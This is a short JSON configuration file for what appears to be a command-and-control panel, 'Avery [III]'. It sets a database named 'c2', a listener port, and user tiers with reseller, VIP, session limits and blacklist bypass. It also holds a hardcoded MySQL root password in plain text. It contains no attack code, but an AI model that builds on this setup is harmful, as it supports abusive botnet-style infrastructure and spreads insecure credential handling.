{
    "masters": {
        "masters_host": ":9999",
        "masters_config_maxauthtries": 3
    },
    "database": {
        "sql_host": "localhost:3306",
        "sql_username": "root",
        "sql_password": "Bruh3689420@",
        "sql_name": "c2"
    },
    "app_config": {
        "app_name": "Avery [III]",
        "app_sig_colour": "[38;5;204m"
    },
    "Disabled_commands": [
        "commands"
    ],
    "Extra": {
        "TableType": "lite",
        "TitleSpinner": false,
        "TitleSpinnerFrames": [
            "/",
            "-",
            "/",
            "|",
            "\\"
        ],
        "DefaultColours": "[0m"
    },
    "User_Defaults": {
        "Admin": false,
        "Reseller": false,
        "VIP": false,
        "Banned": false,
        "MaxSessions": 3,
        "PowerSavingExempt": false,
        "BypassBlacklist": false,
        "DefaultDays": 30
    }
}